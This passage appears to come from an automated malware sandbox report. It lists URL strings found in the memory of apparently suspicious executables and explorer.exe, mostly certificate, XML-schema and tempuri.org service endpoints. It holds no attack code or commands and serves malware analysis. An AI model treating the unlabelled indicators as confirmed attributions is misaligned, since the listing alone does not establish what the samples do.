select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, _ctypes.pyd.15.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1478082591.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467805681.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271235C000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.0000022712359000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1477346297.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271235C000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, _ctypes.pyd.15.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: explorer.exe, 00000007.00000000.1283918666.000000000305D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.1655646473.000000000305D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2536458875.000000000305D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                    Source: 5B34.tmp.zx.exe, 0000000F.00000003.1478082591.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467567529.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1476279166.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1467805681.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468347235.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1479405567.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468690442.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1480543968.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1477346297.000002271234F000.00000004.00000020.00020000.00000000.sdmp, 5B34.tmp.zx.exe, 0000000F.00000003.1468185228.000002271234F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, _ctypes.pyd.15.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: 5B34.tmp.zx.exe, 00000010.00000002.1502931530.00007FF8208FD000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModel
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceModelD
                    Source: explorer.exe, 00000007.00000000.1286061430.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2541447218.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2535902251.0000000002C00000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/:hardwares.
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmp, 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmp, 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.00000000027A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                    Source: 2FDD.tmp.ssg.exe, 00000009.00000002.1565155068.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
